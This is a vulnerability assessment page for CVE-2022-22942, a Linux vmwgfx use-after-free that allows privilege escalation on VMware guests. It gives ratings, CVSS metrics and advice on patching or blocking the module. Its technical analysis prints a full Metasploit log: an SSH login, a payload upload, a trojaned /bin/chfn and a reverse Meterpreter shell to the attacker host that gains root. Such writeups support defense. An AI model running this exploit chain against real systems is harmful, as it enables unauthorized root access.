Attacker Value
High
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Local
1

CVE-2022-22942

Disclosure Date: December 13, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling ‘file’ pointer.

Add Assessment

1
Ratings
Technical Analysis

Description

This vulnerability exploits linux priv esc against VMWare virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMWare driver bug. Specifically, a use-after-free flaw was found in the Linux kernel’s vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx which allows an authenticated user to escalate privileges and spawn a root shell.

Attacker Value & Exploitability

Linux kernel 4.14 was released 12 November 2017 while 5.17 was released 20 March 2022. Although this vulnerability only affects VMware virtual machines I would expect the attack surface to be rather large given the wide range of kernels affected – about 4.5 years of linux kernel releases.

Exploitability requires user level privileges however once those are obtained exploitation is trivial given the metasploit module written to exploit this vulnerability. Simply get a user session and run the exploit as seen demonstrated below:

msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword

[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin
[*] Uploading payload to /tmp/.6ntizxlWd8
[*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.oWt34mDG4b
[*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500
[*] Replacing trojaned /bin/chfn with original

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Defensive Suggestions

In order to protect yourself against exploitation of this vulnerability, ensure your linux VM kernel’s are up to date, and are only connected to the network where necessary.

If you’re absolutely unable to upgrade the kernel of a vulnerable machine it is possible to prevent the vulnerable kernel module from loading, RedHat demonstrates how to do that here: https://access.redhat.com/solutions/41278. However, this is a bandaid fix and promotes poor security posture, update the kernel whenever possible.

CVSS V3 Severity and Metrics
Base Score:
7.8 High
Impact Score:
5.9
Exploitability Score:
1.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • vmware

Products

  • photon os 3.0,
  • photon os 4.0

Additional Info

Technical Analysis